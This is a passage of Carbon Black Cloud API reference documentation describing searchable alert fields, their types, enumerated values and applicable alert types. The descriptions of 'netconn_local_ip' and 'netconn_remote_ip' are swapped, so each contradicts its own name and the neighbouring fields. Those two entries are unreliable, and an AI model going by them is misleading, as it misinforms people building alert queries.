FACET |
minimum_severity |
Searchable
Integer representation of severity of an Alert. Use in search criteria to limit the alerts returned to those with a severity higher than this value |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
ml_classification_anomalies |
List of anomalies associated with this Alert.
anomalous_field
The specific field that is exhibiting anomalous behavior; it helps identify the exact area where the anomaly has occurred. String anomalous_field_baseline_values - The normal or expected values for the data field; this helps quantify the anomaly’s significance. [ String ]
anomaly_name
The anomaly’s name. String anomalous_value
The actual value that was identified as an anomaly; this value contrasts with the baseline values. String |
Nested Response Object:
|
WATCHLIST |
ml_classification_final_verdict |
Searchable Array
Final verdict of the alert, based on the ML models that were used to make the prediction. |
String
NOT_CLASSIFIED
NOT_ANOMALOUS
ANOMALOUS |
WATCHLIST FACET |
ml_classification_global_prevalence |
Searchable Array
Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations. |
String
UNKNOWN
LOW
MEDIUM
HIGH |
WATCHLIST |
ml_classification_org_prevalence |
Searchable Array
Categories (low/medium/high) used to describe the prevalence of alerts within an organization. |
String
UNKNOWN
LOW
MEDIUM
HIGH |
WATCHLIST |
netconn_local_ip |
Searchable Array
IP address of the remote side of the network connection; stored as dotted decimal |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_ipv4 |
Searchable Array
IPv4 address of the local side of the network connection; stored as a dotted decimal. Only one of ipv4 and ipv6 fields will be populated. |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_ipv6 |
Searchable Array
IPv6 address of the local side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_port |
Searchable Array
TCP or UDP port used by the local side of the network connection |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_protocol |
Searchable Array
Network protocol of the network connection |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_domain |
Searchable Array
Domain name (FQDN) associated with the remote end of the network connection, if available |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ip |
Searchable Array
IP address of the local side of the network connection; stored as dotted decimal |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ipv4 |
Searchable Array
IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of ipv4 and ipv6 fields will be populated. |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ipv6 |
Searchable Array
IPv6 address of the remote side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_port |
Searchable Array
TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
org_key |
Unique alphanumeric string that identifies your organization in the Carbon Black Cloud | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_cmdline |
Searchable Array
Command line of the parent process |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_effective_reputation |
Searchable Array
Effective reputation of the parent process; applied by the sensor when the event occurred |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
parent_guid |
Searchable Array
Unique process identifier assigned to the parent process |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_md5 |
Searchable Array
MD5 hash of the parent process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_name |
Searchable Array
Filesystem path of the parent process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
parent_pid |
Searchable Array
Identifier assigned by the operating system to the parent process |
Integer
|
|
parent_reputation |
Searchable Array
Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
parent_sha256 |
Searchable Array
SHA-256 hash of the parent process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
parent_username |
Searchable Array
User context in which the parent process was executed |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
policy_applied |
Searchable Array
Indicates whether or not a policy has been applied to any event associated with this alert |
String
APPLIED
NOT_APPLIED |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
primary_event_id |
Searchable Array
ID of the primary event in the alert |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_cmdline |
Searchable Array
Command line executed by the actor process |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_effective_reputation |
Searchable Array
Effective reputation of the actor hash |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
process_guid |
Searchable Array
Guid of the process that has fired the alert (optional) |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_issuer |
Searchable Array
|
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_md5 |
Searchable Array
MD5 hash of the actor process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_name |
Searchable Array
Process names of an alert |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
process_pid |
Searchable Array
PID of the process that has fired the alert (optional) |
Integer
|
|
process_publisher |
Searchable Array
|
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_reputation |
Searchable Array
Reputation of the actor process; applied when event is processed by the Carbon Black Cloud |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
process_sha256 |
Searchable Array
SHA-256 hash of the actor process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
process_username |
Searchable Array
User context in which the actor process was executed. MacOS - all users for the PID for fork() and exec() transitions. Linux - process user for exec() events, but in a future sensor release can be multi-valued due to setuid(). |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
product_id |
Searchable Array
IDs of the product that identifies USB devices |
String | DEVICE_CONTROL |
product_name |
Searchable Array
Names of the product that identifies USB devices |
String | DEVICE_CONTROL FACET |
reason |
A spoken language written explanation of the what and why the alert occurred and any action taken, usually consisting of 1 to 3 sentences. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
reason_code |
Searchable Array
A unique short-hand code or GUID identifying the particular alert reason |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
remote_is_private |
Searchable
Is the remote information private: true or false |
Boolean
|
CONTAINER_RUNTIME |
remote_k8s_kind |
Searchable Array
Kind of remote workload; set if the remote side is another workload in the same cluster |
String | CONTAINER_RUNTIME |
remote_k8s_namespace |
Searchable Array
Namespace within the remote workload’s cluster; set if the remote side is another workload in the same cluster |
String | CONTAINER_RUNTIME |
remote_k8s_pod_name |
Searchable Array
Remote workload pod name; set if the remote side is another workload in the same cluster |
String | CONTAINER_RUNTIME |
remote_k8s_workload_name |
Searchable Array
Name of the remote workload; set if the remote side is another workload in the same cluster |
String | CONTAINER_RUNTIME |
report_description |
Description of the watchlist report associated with the alert | String | WATCHLIST |
report_id |
Searchable Array
Report IDs that contained the IOC that caused a hit |
String | WATCHLIST |
report_link |
Searchable Array
Link of reports that contained the IOC that caused a hit |
String | WATCHLIST |
report_name |
Searchable Array
Name of the watchlist report |
String | WATCHLIST FACET |
report_tags |
Tags associated with the watchlist report | String[]
|
WATCHLIST |
rule_category_id |
Searchable Array
ID representing the category of the rule_id for certain alert types |
String | CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM FACET |
rule_config_category |
Searchable Array
Types of rule configs |
String | reserved for future use |
rule_id |
Searchable Array
ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts |
String
|
CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM FACET |
run_state |
Searchable Array
Whether the threat in the alert actually ran |
String
DID_NOT_RUN
RAN
UNKNOWN |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
sensor_action |
Searchable Array
Actions taken by the sensor, according to the rules of a policy |
String
ALLOW
ALLOW_AND_LOG
DENY
TERMINATE |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
serial_number |
Searchable Array
Serial numbers of the specific devices |
String | DEVICE_CONTROL |
severity |
Searchable - use minimum_severity
Sortable Integer representation of the impact of alert if true positive |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
tags |
Searchable Array
Tags added to the threat ID of the alert |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
threat_hunt_id |
Searchable
ID of the threat hunt being conducted in your environment by Carbon Black MDR |
String | WATCHLIST |
threat_hunt_name |
Searchable
Name of the threat hunt being conducted in your environment by Carbon Black MDR. The status of a threat hunt can either being ongoing or completed |
String | WATCHLIST FACET |
threat_id |
Searchable Array
ID assigned to a group of alerts with common criteria, based on alert type |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
threat_name |
Searchable Array
Name of the threat |
String | INTRUSION_DETECTION_SYSTEM |
threat_notes_present |
Searchable
True if notes are present on the threat ID. False if notes are not present. |
Boolean
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
tms_rule_id |
Searchable Array
Detection id |
String | INTRUSION_DETECTION_SYSTEM |
ttps |
Searchable Array
Other potential malicious activities involved in a threat |
String | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM |
type |
Searchable Array
Type of alert generated |
String
CB_ANALYTICS
WATCHLIST
DEVICE_CONTROL
CONTAINER_RUNTIME
HOST_BASED_FIREWALL
INTRUSION_DETECTION_SYSTEM
NETWORK_TRAFFIC_ANALYSIS |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
user_update_timestamp |
Searchable Time Range
Sortable Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
vendor_id |
Searchable Array
IDs of the vendors who produced the devices |
String | DEVICE_CONTROL |
vendor_name |
Searchable Array
Names of the vendors who produced the devices |
String | DEVICE_CONTROL FACET |
watchlists |
List of watchlists associated with an alert. Alerts are batched hourly | Nested Response Object:
|
WATCHLIST |
watchlists_id |
Searchable Array
|
String | WATCHLIST |
watchlists_name |
Searchable Array
|
String | WATCHLIST FACET |
workflow |
Current workflow state of an alert. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route. |
Nested Response Object:
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
workflow_change_timestamp |
Searchable Time Range
Sortable When the last status change occurred |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
workflow_changed_by |
Who (or what) made the last status change | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
workflow_changed_by_type |
Searchable Array
|
String
SYSTEM
USER
API
AUTOMATION |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
workflow_closure_reason |
Searchable Array
A more detailed description of why the alert was resolved |
String
NO_REASON
RESOLVED
RESOLVED_BENIGN_KNOWN_GOOD
DUPLICATE_CLEANUP
OTHER |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
workflow_status |
Searchable Array
primary value used to determine if the alert is active or inactive and displayed in the UI by default |
String
OPEN
IN_PROGRESS
CLOSED |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
Limitations
As with standard AND queries when searching for field_1 = X and field_2 = Y, an event with only one field populated
will not be returned.
Last modified on June 6, 2024